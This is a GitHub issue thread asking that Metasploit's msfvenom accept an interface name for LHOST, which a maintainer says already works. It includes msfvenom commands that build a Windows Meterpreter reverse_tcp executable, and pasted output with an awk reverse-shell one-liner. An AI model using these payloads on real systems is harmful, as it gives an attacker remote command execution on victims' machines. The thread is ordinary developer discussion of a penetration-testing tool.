### ISSUE TITLE
[Feature Request] LHOST=<interface>

### ISSUE THREAD

**Issue by g0tmi1k** [rapid7/metasploit-framework#11640]
Currently we do: 
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 -f exe -o payload.exe`

It would be "nice" if we could do: : 
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 -f exe -o payload.exe`

If there are multiple addresses with the interface (such as IPv4/v6), default to the first address (such as IPv4)

**Comment by wvu-r7** [comment]
What about #8336?

**Comment by busterb** [comment]
That's literally how it works now. It just doesn't always choose the address you might want depending on your system, e.g. the 'best' address selection probably shouldn't use your IPv6 link-local by default :)

```
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 160 bytes
awk 'BEGIN{s="/inet/tcp/0/fe80::xxxx:xxxx:xxxx:xxxx/4444";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
```

**Comment by g0tmi1k** [comment]
I will let myself out!

thanks for the info (and sorry for the ticket!)
